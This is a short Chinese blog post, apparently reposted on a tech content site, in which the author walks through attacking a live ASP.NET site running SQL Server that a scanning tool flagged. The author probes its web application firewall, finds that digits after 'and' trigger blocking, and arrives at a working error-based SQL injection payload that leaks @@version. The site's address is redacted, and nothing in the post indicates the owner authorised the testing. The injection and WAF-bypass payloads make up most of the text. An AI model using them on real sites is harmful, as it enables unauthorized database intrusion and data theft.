您好,登錄后才能下訂單哦!
確實是非常簡單,如果是新手的話,我希望能給你帶來一些思路,老鳥的話就emm...
工具掃到了一個有sqlserver特性的站點
通常出現(xiàn)這種錯誤信息,說明該站點配置不當,錯誤信息會直接顯示,也沒用強制類型轉(zhuǎn)換的信息,那么一般就有報錯型注入了!來檢測一下
卻出現(xiàn)了WAF的信息
遇到WAF首先得先看看是什么關(guān)鍵字觸發(fā)了攔截請求,所以我們先進行簡單的調(diào)試
http://xxxx/xxxx.aspx?xxxx=1' and --a
語法出錯是很正常的,因為我們添加了and且后面沒任何值,所以我們可以假設語句變成了
select xxx from xxx where xxxx=1' and --a
但我們發(fā)現(xiàn)其實并沒有觸發(fā)WAF,說明and關(guān)鍵字并沒有在過濾的列表當中,繼續(xù)嘗試
http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a
竟然觸發(fā)了WAF,經(jīng)過多次調(diào)試,發(fā)現(xiàn)是and后面居然不能帶數(shù)字。。這樣就不會報錯了
http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a
那么再次嘗試下原來的代碼,將順序調(diào)整,成功!
http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。